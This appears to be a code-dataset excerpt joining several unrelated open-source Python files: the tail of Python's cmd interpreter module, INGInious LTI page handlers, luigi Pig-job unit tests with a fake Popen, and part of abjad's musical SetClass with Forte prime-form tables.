2. A command is parsed out of each line by collecting the prefix composed
of characters in the identchars member.
3. A command `foo' is dispatched to a method 'do_foo()'; the do_ method
is passed a single argument consisting of the remainder of the line.
4. Typing an empty line repeats the last command. (Actually, it calls the
method `emptyline', which may be overridden in a subclass.)
5. There is a predefined `help' method. Given an argument `topic', it
calls the command `help_topic'. With no arguments, it lists all topics
with defined help_ functions, broken into up to three topics; documented
commands, miscellaneous help topics, and undocumented commands.
6. The command '?' is a synonym for `help'. The command '!' is a synonym
for `shell', if a do_shell method exists.
7. If completion is enabled, completing commands will be done automatically,
and completing of commands args is done by calling complete_foo() with
arguments text, line, begidx, endidx. text is string we are matching
against, all returned matches must begin with it. line is the current
input line (lstripped), begidx and endidx are the beginning and end
indexes of the text being matched, which could be used to provide
different completion depending upon which position the argument is in.
The `default' method may be overridden to intercept commands for which there
is no do_ method.
The `completedefault' method may be overridden to intercept completions for
commands that have no complete_ method.
The data member `self.ruler' sets the character used to draw separator lines
in the help messages. If empty, no ruler line is drawn. It defaults to "=".
If the value of `self.intro' is nonempty when the cmdloop method is called,
it is printed out on interpreter startup. This value may be overridden
via an optional argument to the cmdloop() method.
The data members `self.doc_header', `self.misc_header', and
`self.undoc_header' set the headers used for the help function's
listings of documented functions, miscellaneous topics, and undocumented
functions respectively.
These interpreters use raw_input; thus, if the readline module is loaded,
they automatically support Emacs-like command history and editing features.
"""
import string
__all__ = ["Cmd"]
PROMPT = '(Cmd) '
IDENTCHARS = string.ascii_letters + string.digits + '_'
class Cmd:
"""A simple framework for writing line-oriented command interpreters.
These are often useful for test harnesses, administrative tools, and
prototypes that will later be wrapped in a more sophisticated interface.
A Cmd instance or subclass instance is a line-oriented interpreter
framework. There is no good reason to instantiate Cmd itself; rather,
it's useful as a superclass of an interpreter class you define yourself
in order to inherit Cmd's methods and encapsulate action methods.
"""
prompt = PROMPT
identchars = IDENTCHARS
ruler = '='
lastcmd = ''
intro = None
doc_leader = ""
doc_header = "Documented commands (type help <topic>):"
misc_header = "Miscellaneous help topics:"
undoc_header = "Undocumented commands:"
nohelp = "*** No help on %s"
use_rawinput = 1
def __init__(self, completekey='tab', stdin=None, stdout=None):
"""Instantiate a line-oriented interpreter framework.
The optional argument 'completekey' is the readline name of a
completion key; it defaults to the Tab key. If completekey is
not None and the readline module is available, command completion
is done automatically. The optional arguments stdin and stdout
specify alternate input and output file objects; if not specified,
sys.stdin and sys.stdout are used.
"""
import sys
if stdin is not None:
self.stdin = stdin
else:
self.stdin = sys.stdin
if stdout is not None:
self.stdout = stdout
else:
self.stdout = sys.stdout
self.cmdqueue = []
self.completekey = completekey
def cmdloop(self, intro=None):
"""Repeatedly issue a prompt, accept input, parse an initial prefix
off the received input, and dispatch to action methods, passing them
the remainder of the line as argument.
"""
self.preloop()
if self.use_rawinput and self.completekey:
try:
import readline
self.old_completer = readline.get_completer()
readline.set_completer(self.complete)
readline.parse_and_bind(self.completekey+": complete")
except ImportError:
pass
try:
if intro is not None:
self.intro = intro
if self.intro:
self.stdout.write(str(self.intro)+"\n")
stop = None
while not stop:
if self.cmdqueue:
line = self.cmdqueue.pop(0)
else:
if self.use_rawinput:
try:
line = raw_input(self.prompt)
except EOFError:
line = 'EOF'
else:
self.stdout.write(self.prompt)
self.stdout.flush()
line = self.stdin.readline()
if not len(line):
line = 'EOF'
else:
line = line.rstrip('\r\n')
line = self.precmd(line)
stop = self.onecmd(line)
stop = self.postcmd(stop, line)
self.postloop()
finally:
if self.use_rawinput and self.completekey:
try:
import readline
readline.set_completer(self.old_completer)
except ImportError:
pass
def precmd(self, line):
"""Hook method executed just before the command line is
interpreted, but after the input prompt is generated and issued.
"""
return line
def postcmd(self, stop, line):
"""Hook method executed just after a command dispatch is finished."""
return stop
def preloop(self):
"""Hook method executed once when the cmdloop() method is called."""
pass
def postloop(self):
"""Hook method executed once when the cmdloop() method is about to
return.
"""
pass
def parseline(self, line):
"""Parse the line into a command name and a string containing
the arguments. Returns a tuple containing (command, args, line).
'command' and 'args' may be None if the line couldn't be parsed.
"""
line = line.strip()
if not line:
return None, None, line
elif line[0] == '?':
line = 'help ' + line[1:]
elif line[0] == '!':
if hasattr(self, 'do_shell'):
line = 'shell ' + line[1:]
else:
return None, None, line
i, n = 0, len(line)
while i < n and line[i] in self.identchars: i = i+1
cmd, arg = line[:i], line[i:].strip()
return cmd, arg, line
def onecmd(self, line):
"""Interpret the argument as though it had been typed in response
to the prompt.
This may be overridden, but should not normally need to be;
see the precmd() and postcmd() methods for useful execution hooks.
The return value is a flag indicating whether interpretation of
commands by the interpreter should stop.
"""
cmd, arg, line = self.parseline(line)
if not line:
return self.emptyline()
if cmd is None:
return self.default(line)
self.lastcmd = line
if cmd == '':
return self.default(line)
else:
try:
func = getattr(self, 'do_' + cmd)
except AttributeError:
return self.default(line)
return func(arg)
def emptyline(self):
"""Called when an empty line is entered in response to the prompt.
If this method is not overridden, it repeats the last nonempty
command entered.
"""
if self.lastcmd:
return self.onecmd(self.lastcmd)
def default(self, line):
"""Called on an input line when the command prefix is not recognized.
If this method is not overridden, it prints an error message and
returns.
"""
self.stdout.write('*** Unknown syntax: %s\n'%line)
def completedefault(self, *ignored):
"""Method called to complete an input line when no command-specific
complete_*() method is available.
By default, it returns an empty list.
"""
return []
def completenames(self, text, *ignored):
dotext = 'do_'+text
return [a[3:] for a in self.get_names() if a.startswith(dotext)]
def complete(self, text, state):
"""Return the next possible completion for 'text'.
If a command has not been entered, then complete against command list.
Otherwise try to call complete_<command> to get list of completions.
"""
if state == 0:
import readline
origline = readline.get_line_buffer()
line = origline.lstrip()
stripped = len(origline) - len(line)
begidx = readline.get_begidx() - stripped
endidx = readline.get_endidx() - stripped
if begidx>0:
cmd, args, foo = self.parseline(line)
if cmd == '':
compfunc = self.completedefault
else:
try:
compfunc = getattr(self, 'complete_' + cmd)
except AttributeError:
compfunc = self.completedefault
else:
compfunc = self.completenames
self.completion_matches = compfunc(text, line, begidx, endidx)
try:
return self.completion_matches[state]
except IndexError:
return None
def get_names(self):
# This method used to pull in base class attributes
# at a time dir() didn't do it yet.
return dir(self.__class__)
def complete_help(self, *args):
commands = set(self.completenames(*args))
topics = set(a[5:] for a in self.get_names()
if a.startswith('help_' + args[0]))
return list(commands | topics)
def do_help(self, arg):
if arg:
# XXX check arg syntax
try:
func = getattr(self, 'help_' + arg)
except AttributeError:
try:
doc=getattr(self, 'do_' + arg).__doc__
if doc:
self.stdout.write("%s\n"%str(doc))
return
except AttributeError:
pass
self.stdout.write("%s\n"%str(self.nohelp % (arg,)))
return
func()
else:
names = self.get_names()
cmds_doc = []
cmds_undoc = []
help = {}
for name in names:
if name[:5] == 'help_':
help[name[5:]]=1
names.sort()
# There can be duplicates if routines overridden
prevname = ''
for name in names:
if name[:3] == 'do_':
if name == prevname:
continue
prevname = name
cmd=name[3:]
if cmd in help:
cmds_doc.append(cmd)
del help[cmd]
elif getattr(self, name).__doc__:
cmds_doc.append(cmd)
else:
cmds_undoc.append(cmd)
self.stdout.write("%s\n"%str(self.doc_leader))
self.print_topics(self.doc_header, cmds_doc, 15,80)
self.print_topics(self.misc_header, help.keys(),15,80)
self.print_topics(self.undoc_header, cmds_undoc, 15,80)
def print_topics(self, header, cmds, cmdlen, maxcol):
if cmds:
self.stdout.write("%s\n"%str(header))
if self.ruler:
self.stdout.write("%s\n"%str(self.ruler * len(header)))
self.columnize(cmds, maxcol-1)
self.stdout.write("\n")
def columnize(self, list, displaywidth=80):
"""Display a list of strings as a compact set of columns.
Each column is only as wide as necessary.
Columns are separated by two spaces (one was not legible enough).
"""
if not list:
self.stdout.write("<empty>\n")
return
nonstrings = [i for i in range(len(list))
if not isinstance(list[i], str)]
if nonstrings:
raise TypeError, ("list[i] not a string for i in %s" %
", ".join(map(str, nonstrings)))
size = len(list)
if size == 1:
self.stdout.write('%s\n'%str(list[0]))
return
# Try every row count from 1 upwards
for nrows in range(1, len(list)):
ncols = (size+nrows-1) // nrows
colwidths = []
totwidth = -2
for col in range(ncols):
colwidth = 0
for row in range(nrows):
i = row + nrows*col
if i >= size:
break
x = list[i]
colwidth = max(colwidth, len(x))
colwidths.append(colwidth)
totwidth += colwidth + 2
if totwidth > displaywidth:
break
if totwidth <= displaywidth:
break
else:
nrows = len(list)
ncols = 1
colwidths = [0]
for row in range(nrows):
texts = []
for col in range(ncols):
i = row + nrows*col
if i >= size:
x = ""
else:
x = list[i]
texts.append(x)
while texts and not texts[-1]:
del texts[-1]
for col in range(len(texts)):
texts[col] = texts[col].ljust(colwidths[col])
self.stdout.write("%s\n"%str(" ".join(texts)))
| gpl-3.0 |
UCL-INGI/INGInious | inginious/frontend/pages/lti.py | 1 | 12048 | # -*- coding: utf-8 -*-
#
# This file is part of INGInious. See the LICENSE and the COPYRIGHTS files for
# more information about the licensing of this file.
import flask
from flask import redirect
from werkzeug.exceptions import Forbidden, NotFound, MethodNotAllowed
from inginious.frontend.lti_request_validator import LTIValidator
from inginious.frontend.pages.utils import INGIniousPage, INGIniousAuthPage
from itsdangerous import want_bytes
from inginious.common import exceptions
from inginious.frontend.lti_tool_provider import LTIWebPyToolProvider
from inginious.frontend.pages.tasks import BaseTaskPage
class LTITaskPage(INGIniousAuthPage):
def is_lti_page(self):
return True
def GET_AUTH(self):
data = self.user_manager.session_lti_info()
if data is None:
raise Forbidden(description=_("No LTI data available."))
(courseid, taskid) = data['task']
return BaseTaskPage(self).GET(courseid, taskid, True)
def POST_AUTH(self):
data = self.user_manager.session_lti_info()
if data is None:
raise Forbidden(description=_("No LTI data available."))
(courseid, taskid) = data['task']
return BaseTaskPage(self).POST(courseid, taskid, True)
class LTIAssetPage(INGIniousAuthPage):
def is_lti_page(self):
return True
def GET_AUTH(self, asset_url):
data = self.user_manager.session_lti_info()
if data is None:
raise Forbidden(description=_("No LTI data available."))
(courseid, _) = data['task']
return redirect(self.app.get_homepath() + "/course/{courseid}/{asset_url}".format(courseid=courseid, asset_url=asset_url))
class LTIBindPage(INGIniousAuthPage):
def is_lti_page(self):
return False
def fetch_lti_data(self, sessionid):
# TODO : Flask session interface does not allow to open a specific session
# It could be worth putting these information outside of the session dict
sess = self.database.sessions.find_one({"_id": sessionid})
if sess:
cookieless_session = self.app.session_interface.serializer.loads(want_bytes(sess['data']))
else:
return KeyError()
return sessionid, cookieless_session["lti"]
def GET_AUTH(self):
input_data = flask.request.args
if "sessionid" not in input_data:
return self.template_helper.render("lti_bind.html", success=False, sessionid="",
data=None, error=_("Missing LTI session id"))
try:
cookieless_session_id, data = self.fetch_lti_data(input_data["sessionid"])
except KeyError:
return self.template_helper.render("lti_bind.html", success=False, sessionid="",
data=None, error=_("Invalid LTI session id"))
return self.template_helper.render("lti_bind.html", success=False,
sessionid=cookieless_session_id, data=data, error="")
def POST_AUTH(self):
input_data = flask.request.args
if "sessionid" not in input_data:
return self.template_helper.render("lti_bind.html",success=False, sessionid="",
data= None, error=_("Missing LTI session id"))
try:
cookieless_session_id, data = self.fetch_lti_data(input_data["sessionid"])
except KeyError:
return self.template_helper.render("lti_bind.html", success=False, sessionid="",
data=None, error=_("Invalid LTI session id"))
try:
course = self.course_factory.get_course(data["task"][0])
if data["consumer_key"] not in course.lti_keys().keys():
raise Exception()
except:
return self.template_helper.render("lti_bind.html", success=False, sessionid="",
data=None, error=_("Invalid LTI data"))
if data:
user_profile = self.database.users.find_one({"username": self.user_manager.session_username()})
lti_user_profile = self.database.users.find_one(
{"ltibindings." + data["task"][0] + "." + data["consumer_key"]: data["username"]})
if not user_profile.get("ltibindings", {}).get(data["task"][0], {}).get(data["consumer_key"],
"") and not lti_user_profile:
# There is no binding yet, so bind LTI to this account
self.database.users.find_one_and_update({"username": self.user_manager.session_username()}, {"$set": {
"ltibindings." + data["task"][0] + "." + data["consumer_key"]: data["username"]}})
elif not (lti_user_profile and user_profile["username"] == lti_user_profile["username"]):
# There exists an LTI binding for another account, refuse auth!
self.logger.info("User %s tried to bind LTI user %s in for %s:%s, but %s is already bound.",
user_profile["username"],
data["username"],
data["task"][0],
data["consumer_key"],
user_profile.get("ltibindings", {}).get(data["task"][0], {}).get(data["consumer_key"], ""))
return self.template_helper.render("lti_bind.html", success=False,
sessionid=cookieless_session_id,
data=data,
error=_("Your account is already bound with this context."))
return self.template_helper.render("lti_bind.html", success=True,
sessionid=cookieless_session_id, data=data, error="")
class LTILoginPage(INGIniousPage):
def is_lti_page(self):
return True
def GET(self):
"""
Checks if user is authenticated and calls POST_AUTH or performs login and calls GET_AUTH.
Otherwise, returns the login template.
"""
data = self.user_manager.session_lti_info()
if data is None:
raise Forbidden(description=_("No LTI data available."))
try:
course = self.course_factory.get_course(data["task"][0])
if data["consumer_key"] not in course.lti_keys().keys():
raise Exception()
except:
return self.template_helper.render("lti_bind.html", success=False, sessionid="",
data=None, error="Invalid LTI data")
user_profile = self.database.users.find_one({"ltibindings." + data["task"][0] + "." + data["consumer_key"]: data["username"]})
if user_profile:
self.user_manager.connect_user(user_profile["username"], user_profile["realname"], user_profile["email"],
user_profile["language"], user_profile.get("tos_accepted", False))
if self.user_manager.session_logged_in():
return redirect(self.app.get_homepath() + "/lti/task")
return self.template_helper.render("lti_login.html")
def POST(self):
"""
Checks if user is authenticated and calls POST_AUTH or performs login and calls GET_AUTH.
Otherwise, returns the login template.
"""
return self.GET()
class LTILaunchPage(INGIniousPage):
"""
Page called by the TC to start an LTI session on a given task
"""
def GET(self, courseid, taskid):
raise MethodNotAllowed()
def POST(self, courseid, taskid):
(sessionid, loggedin) = self._parse_lti_data(courseid, taskid)
if loggedin:
return redirect(self.app.get_homepath() + "/@{}@/lti/task".format(sessionid))
else:
return redirect(self.app.get_homepath() + "/@{}@/lti/login".format(sessionid))
def _parse_lti_data(self, courseid, taskid):
""" Verify and parse the data for the LTI basic launch """
post_input = flask.request.form
self.logger.debug('_parse_lti_data:' + str(post_input))
try:
course = self.course_factory.get_course(courseid)
except exceptions.CourseNotFoundException as ex:
raise NotFound(description=_(str(ex)))
try:
test = LTIWebPyToolProvider.from_webpy_request()
validator = LTIValidator(self.database.nonce, course.lti_keys())
verified = test.is_valid_request(validator)
except Exception as ex:
self.logger.error("Error while parsing the LTI request : {}".format(str(post_input)))
self.logger.error("The exception caught was : {}".format(str(ex)))
raise Forbidden(description=_("Error while parsing the LTI request"))
if verified:
self.logger.debug('parse_lit_data for %s', str(post_input))
user_id = post_input["user_id"]
roles = post_input.get("roles", "Student").split(",")
realname = self._find_realname(post_input)
email = post_input.get("lis_person_contact_email_primary", "")
lis_outcome_service_url = post_input.get("lis_outcome_service_url", None)
outcome_result_id = post_input.get("lis_result_sourcedid", None)
consumer_key = post_input["oauth_consumer_key"]
if course.lti_send_back_grade():
if lis_outcome_service_url is None or outcome_result_id is None:
self.logger.info('Error: lis_outcome_service_url is None but lti_send_back_grade is True')
raise Forbidden(description=_("In order to send grade back to the TC, INGInious needs the parameters lis_outcome_service_url and "
"lis_outcome_result_id in the LTI basic-launch-request. Please contact your administrator."))
else:
lis_outcome_service_url = None
outcome_result_id = None
tool_name = post_input.get('tool_consumer_instance_name', 'N/A')
tool_desc = post_input.get('tool_consumer_instance_description', 'N/A')
tool_url = post_input.get('tool_consumer_instance_url', 'N/A')
context_title = post_input.get('context_title', 'N/A')
context_label = post_input.get('context_label', 'N/A')
session_id = self.user_manager.create_lti_session(user_id, roles, realname, email, courseid, taskid, consumer_key,
lis_outcome_service_url, outcome_result_id, tool_name, tool_desc, tool_url,
context_title, context_label)
loggedin = self.user_manager.attempt_lti_login()
return session_id, loggedin
else:
self.logger.info("Couldn't validate LTI request")
raise Forbidden(description=_("Couldn't validate LTI request"))
def _find_realname(self, post_input):
""" Returns the most appropriate name to identify the user """
# First, try the full name
if "lis_person_name_full" in post_input:
return post_input["lis_person_name_full"]
if "lis_person_name_given" in post_input and "lis_person_name_family" in post_input:
return post_input["lis_person_name_given"] + post_input["lis_person_name_family"]
# Then the email
if "lis_person_contact_email_primary" in post_input:
return post_input["lis_person_contact_email_primary"]
# Then only part of the full name
if "lis_person_name_family" in post_input:
return post_input["lis_person_name_family"]
if "lis_person_name_given" in post_input:
return post_input["lis_person_name_given"]
return post_input["user_id"]
| agpl-3.0 |
pkexcellent/luigi | test/contrib/pig_test.py | 36 | 5241 | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import subprocess
import tempfile
import luigi
from helpers import with_config, unittest
from luigi.contrib.pig import PigJobError, PigJobTask
from mock import patch
class SimpleTestJob(PigJobTask):
def output(self):
return luigi.LocalTarget('simple-output')
def pig_script_path(self):
return "my_simple_pig_script.pig"
class ComplexTestJob(PigJobTask):
def output(self):
return luigi.LocalTarget('complex-output')
def pig_script_path(self):
return "my_complex_pig_script.pig"
def pig_env_vars(self):
return {'PIG_CLASSPATH': '/your/path'}
def pig_properties(self):
return {'pig.additional.jars': '/path/to/your/jar'}
def pig_parameters(self):
return {'YOUR_PARAM_NAME': 'Your param value'}
def pig_options(self):
return ['-x', 'local']
class SimplePigTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
@patch('subprocess.Popen')
def test_run__success(self, mock):
arglist_result = []
p = subprocess.Popen
subprocess.Popen = _get_fake_Popen(arglist_result, 0)
try:
job = SimpleTestJob()
job.run()
self.assertEqual([['/usr/share/pig/bin/pig', '-f', 'my_simple_pig_script.pig']], arglist_result)
finally:
subprocess.Popen = p
@patch('subprocess.Popen')
def test_run__fail(self, mock):
arglist_result = []
p = subprocess.Popen
subprocess.Popen = _get_fake_Popen(arglist_result, 1)
try:
job = SimpleTestJob()
job.run()
self.assertEqual([['/usr/share/pig/bin/pig', '-f', 'my_simple_pig_script.pig']], arglist_result)
except PigJobError as e:
p = e
self.assertEqual('stderr', p.err)
else:
self.fail("Should have thrown PigJobError")
finally:
subprocess.Popen = p
class ComplexPigTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
@patch('subprocess.Popen')
def test_run__success(self, mock):
arglist_result = []
p = subprocess.Popen
subprocess.Popen = _get_fake_Popen(arglist_result, 0)
try:
job = ComplexTestJob()
job.run()
self.assertEqual([['/usr/share/pig/bin/pig', '-x', 'local', '-p', 'YOUR_PARAM_NAME=Your param value', '-propertyFile', 'pig_property_file', '-f', 'my_complex_pig_script.pig']], arglist_result)
# Check property file
with open('pig_property_file') as pprops_file:
pprops = pprops_file.readlines()
self.assertEqual(1, len(pprops))
self.assertEqual('pig.additional.jars=/path/to/your/jar\n', pprops[0])
finally:
subprocess.Popen = p
@patch('subprocess.Popen')
def test_run__fail(self, mock):
arglist_result = []
p = subprocess.Popen
subprocess.Popen = _get_fake_Popen(arglist_result, 1)
try:
job = ComplexTestJob()
job.run()
except PigJobError as e:
p = e
self.assertEqual('stderr', p.err)
self.assertEqual([['/usr/share/pig/bin/pig', '-x', 'local', '-p', 'YOUR_PARAM_NAME=Your param value', '-propertyFile', 'pig_property_file', '-f', 'my_complex_pig_script.pig']], arglist_result)
# Check property file
with open('pig_property_file') as pprops_file:
pprops = pprops_file.readlines()
self.assertEqual(1, len(pprops))
self.assertEqual('pig.additional.jars=/path/to/your/jar\n', pprops[0])
else:
self.fail("Should have thrown PigJobError")
finally:
subprocess.Popen = p
def _get_fake_Popen(arglist_result, return_code, *args, **kwargs):
def Popen_fake(arglist, shell=None, stdout=None, stderr=None, env=None, close_fds=True):
arglist_result.append(arglist)
class P(object):
def wait(self):
pass
def poll(self):
return 0
def communicate(self):
return 'end'
def env(self):
return self.env
p = P()
p.returncode = return_code
p.stderr = tempfile.TemporaryFile()
p.stdout = tempfile.TemporaryFile()
p.stdout.write(b'stdout')
p.stderr.write(b'stderr')
# Reset temp files so the output can be read.
p.stdout.seek(0)
p.stderr.seek(0)
return p
return Popen_fake
| apache-2.0 |
Abjad/abjad | abjad/pitch/SetClass.py | 1 | 55672 | from .. import math
from ..storage import StorageFormatManager
from .pitchclasses import NumberedPitchClass
from .sets import PitchClassSet
class SetClass:
"""
Set-class.
.. container:: example
Makes SG2 set-class from Forte rank:
>>> set_class = abjad.SetClass(4, 29)
>>> print(set_class)
SC(4-29){0, 1, 3, 7}
Makes SG2 set-class from lex rank:
>>> set_class = abjad.SetClass(4, 29, lex_rank=True)
>>> print(set_class)
SC(4-29){0, 3, 6, 9}
Makes SG1 set-class:
>>> set_class = abjad.SetClass(4, 29, transposition_only=True)
>>> print(set_class)
SC(4-29){0, 2, 6, 7}
.. container:: example
Makes aggregate:
>>> set_class = abjad.SetClass(12, 1, transposition_only=True)
>>> print(set_class)
SC(12-1){0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11}
.. container:: example
Lists SG2 tetrachords, pentachords, hexachords by Forte rank:
>>> set_classes = abjad.SetClass.list_set_classes(cardinality=4)
>>> for set_class in set_classes:
... print(set_class)
...
SC(4-1){0, 1, 2, 3}
SC(4-2){0, 1, 2, 4}
SC(4-3){0, 1, 3, 4}
SC(4-4){0, 1, 2, 5}
SC(4-5){0, 1, 2, 6}
SC(4-6){0, 1, 2, 7}
SC(4-7){0, 1, 4, 5}
SC(4-8){0, 1, 5, 6}
SC(4-9){0, 1, 6, 7}
SC(4-10){0, 2, 3, 5}
SC(4-11){0, 1, 3, 5}
SC(4-12){0, 2, 3, 6}
SC(4-13){0, 1, 3, 6}
SC(4-14){0, 2, 3, 7}
SC(4-15){0, 1, 4, 6}
SC(4-16){0, 1, 5, 7}
SC(4-17){0, 3, 4, 7}
SC(4-18){0, 1, 4, 7}
SC(4-19){0, 1, 4, 8}
SC(4-20){0, 1, 5, 8}
SC(4-21){0, 2, 4, 6}
SC(4-22){0, 2, 4, 7}
SC(4-23){0, 2, 5, 7}
SC(4-24){0, 2, 4, 8}
SC(4-25){2, 6, 8, 9}
SC(4-26){0, 3, 5, 8}
SC(4-27){0, 2, 5, 8}
SC(4-28){0, 3, 6, 9}
SC(4-29){0, 1, 3, 7}
>>> set_classes = abjad.SetClass.list_set_classes(cardinality=5)
>>> for set_class in set_classes:
... print(set_class)
...
SC(5-1){0, 1, 2, 3, 4}
SC(5-2){0, 1, 2, 3, 5}
SC(5-3){0, 1, 2, 4, 5}
SC(5-4){0, 1, 2, 3, 6}
SC(5-5){0, 1, 2, 3, 7}
SC(5-6){0, 1, 2, 5, 6}
SC(5-7){0, 1, 2, 6, 7}
SC(5-8){0, 2, 3, 4, 6}
SC(5-9){0, 1, 2, 4, 6}
SC(5-10){0, 1, 3, 4, 6}
SC(5-11){0, 2, 3, 4, 7}
SC(5-12){0, 1, 3, 5, 6}
SC(5-13){0, 1, 2, 4, 8}
SC(5-14){0, 1, 2, 5, 7}
SC(5-15){0, 1, 2, 6, 8}
SC(5-16){0, 1, 3, 4, 7}
SC(5-17){0, 1, 3, 4, 8}
SC(5-18){0, 1, 4, 5, 7}
SC(5-19){0, 1, 3, 6, 7}
SC(5-20){0, 1, 3, 7, 8}
SC(5-21){0, 1, 4, 5, 8}
SC(5-22){0, 1, 4, 7, 8}
SC(5-23){0, 2, 3, 5, 7}
SC(5-24){0, 1, 3, 5, 7}
SC(5-25){0, 2, 3, 5, 8}
SC(5-26){0, 2, 4, 5, 8}
SC(5-27){0, 1, 3, 5, 8}
SC(5-28){0, 2, 3, 6, 8}
SC(5-29){0, 1, 3, 6, 8}
SC(5-30){0, 1, 4, 6, 8}
SC(5-31){0, 1, 3, 6, 9}
SC(5-32){0, 1, 4, 6, 9}
SC(5-33){0, 2, 4, 6, 8}
SC(5-34){0, 2, 4, 6, 9}
SC(5-35){0, 2, 4, 7, 9}
SC(5-36){0, 1, 2, 4, 7}
SC(5-37){0, 3, 4, 5, 8}
SC(5-38){0, 1, 2, 5, 8}
>>> set_classes = abjad.SetClass.list_set_classes(cardinality=6)
>>> for set_class in set_classes:
... print(set_class)
...
SC(6-1){0, 1, 2, 3, 4, 5}
SC(6-2){0, 1, 2, 3, 4, 6}
SC(6-3){0, 1, 2, 3, 5, 6}
SC(6-4){0, 1, 2, 4, 5, 6}
SC(6-5){0, 1, 2, 3, 6, 7}
SC(6-6){0, 1, 2, 5, 6, 7}
SC(6-7){0, 1, 2, 6, 7, 8}
SC(6-8){0, 2, 3, 4, 5, 7}
SC(6-9){0, 1, 2, 3, 5, 7}
SC(6-10){0, 1, 3, 4, 5, 7}
SC(6-11){0, 1, 2, 4, 5, 7}
SC(6-12){0, 1, 2, 4, 6, 7}
SC(6-13){0, 1, 3, 4, 6, 7}
SC(6-14){0, 1, 3, 4, 5, 8}
SC(6-15){0, 1, 2, 4, 5, 8}
SC(6-16){0, 1, 4, 5, 6, 8}
SC(6-17){0, 1, 2, 4, 7, 8}
SC(6-18){0, 1, 2, 5, 7, 8}
SC(6-19){0, 1, 3, 4, 7, 8}
SC(6-20){0, 1, 4, 5, 8, 9}
SC(6-21){0, 2, 3, 4, 6, 8}
SC(6-22){0, 1, 2, 4, 6, 8}
SC(6-23){0, 2, 3, 5, 6, 8}
SC(6-24){0, 1, 3, 4, 6, 8}
SC(6-25){0, 1, 3, 5, 6, 8}
SC(6-26){0, 1, 3, 5, 7, 8}
SC(6-27){0, 1, 3, 4, 6, 9}
SC(6-28){0, 1, 3, 5, 6, 9}
SC(6-29){0, 1, 3, 6, 8, 9}
SC(6-30){0, 1, 3, 6, 7, 9}
SC(6-31){0, 1, 3, 5, 8, 9}
SC(6-32){0, 2, 4, 5, 7, 9}
SC(6-33){0, 2, 3, 5, 7, 9}
SC(6-34){0, 1, 3, 5, 7, 9}
SC(6-35){0, 2, 4, 6, 8, 10}
SC(6-36){0, 1, 2, 3, 4, 7}
SC(6-37){0, 1, 2, 3, 4, 8}
SC(6-38){0, 1, 2, 3, 7, 8}
SC(6-39){0, 2, 3, 4, 5, 8}
SC(6-40){0, 1, 2, 3, 5, 8}
SC(6-41){0, 1, 2, 3, 6, 8}
SC(6-42){0, 1, 2, 3, 6, 9}
SC(6-43){0, 1, 2, 5, 6, 8}
SC(6-44){0, 1, 2, 5, 6, 9}
SC(6-45){0, 2, 3, 4, 6, 9}
SC(6-46){0, 1, 2, 4, 6, 9}
SC(6-47){0, 1, 2, 4, 7, 9}
SC(6-48){0, 1, 2, 5, 7, 9}
SC(6-49){0, 1, 3, 4, 7, 9}
SC(6-50){0, 1, 4, 6, 7, 9}
There are 352 SG1 set-classes and 224 SG2 set-classes.
"""
### CLASS VARIABLES ##
__slots__ = (
"_cardinality",
"_lex_rank",
"_prime_form",
"_rank",
"_transposition_only",
)
_forte_identifier_to_prime_form = {
# 0
(0, 1): (),
# 1
(1, 1): (0,),
# 2
(2, 1): (0, 1),
(2, 2): (0, 2),
(2, 3): (0, 3),
(2, 4): (0, 4),
(2, 5): (0, 5),
(2, 6): (0, 6),
# 3
(3, 1): (0, 1, 2),
(3, 2): (0, 1, 3),
(3, 3): (0, 1, 4),
(3, 4): (0, 1, 5),
(3, 5): (0, 1, 6),
(3, 6): (0, 2, 4),
(3, 7): (0, 2, 5),
(3, 8): (0, 2, 6),
(3, 9): (0, 2, 7),
(3, 10): (0, 3, 6),
(3, 11): (0, 3, 7),
(3, 12): (0, 4, 8),
# 4
(4, 1): (0, 1, 2, 3),
(4, 2): (0, 1, 2, 4),
(4, 3): (0, 1, 3, 4),
(4, 4): (0, 1, 2, 5),
(4, 5): (0, 1, 2, 6),
(4, 6): (0, 1, 2, 7),
(4, 7): (0, 1, 4, 5),
(4, 8): (0, 1, 5, 6),
(4, 9): (0, 1, 6, 7),
(4, 10): (0, 2, 3, 5),
(4, 11): (0, 1, 3, 5),
(4, 12): (0, 2, 3, 6),
(4, 13): (0, 1, 3, 6),
(4, 14): (0, 2, 3, 7),
(4, 15): (0, 1, 4, 6),
(4, 16): (0, 1, 5, 7),
(4, 17): (0, 3, 4, 7),
(4, 18): (0, 1, 4, 7),
(4, 19): (0, 1, 4, 8),
(4, 20): (0, 1, 5, 8),
(4, 21): (0, 2, 4, 6),
(4, 22): (0, 2, 4, 7),
(4, 23): (0, 2, 5, 7),
(4, 24): (0, 2, 4, 8),
(4, 25): (9, 2, 6, 8),
(4, 26): (0, 3, 5, 8),
(4, 27): (0, 2, 5, 8),
(4, 28): (0, 3, 6, 9),
(4, 29): (0, 1, 3, 7),
# 5
(5, 1): (0, 1, 2, 3, 4),
(5, 2): (0, 1, 2, 3, 5),
(5, 3): (0, 1, 2, 4, 5),
(5, 4): (0, 1, 2, 3, 6),
(5, 5): (0, 1, 2, 3, 7),
(5, 6): (0, 1, 2, 5, 6),
(5, 7): (0, 1, 2, 6, 7),
(5, 8): (0, 2, 3, 4, 6),
(5, 9): (0, 1, 2, 4, 6),
(5, 10): (0, 1, 3, 4, 6),
(5, 11): (0, 2, 3, 4, 7),
(5, 12): (0, 1, 3, 5, 6),
(5, 13): (0, 1, 2, 4, 8),
(5, 14): (0, 1, 2, 5, 7),
(5, 15): (0, 1, 2, 6, 8),
(5, 16): (0, 1, 3, 4, 7),
(5, 17): (0, 1, 3, 4, 8),
(5, 18): (0, 1, 4, 5, 7),
(5, 19): (0, 1, 3, 6, 7),
(5, 20): (0, 1, 3, 7, 8),
(5, 21): (0, 1, 4, 5, 8),
(5, 22): (0, 1, 4, 7, 8),
(5, 23): (0, 2, 3, 5, 7),
(5, 24): (0, 1, 3, 5, 7),
(5, 25): (0, 2, 3, 5, 8),
(5, 26): (0, 2, 4, 5, 8),
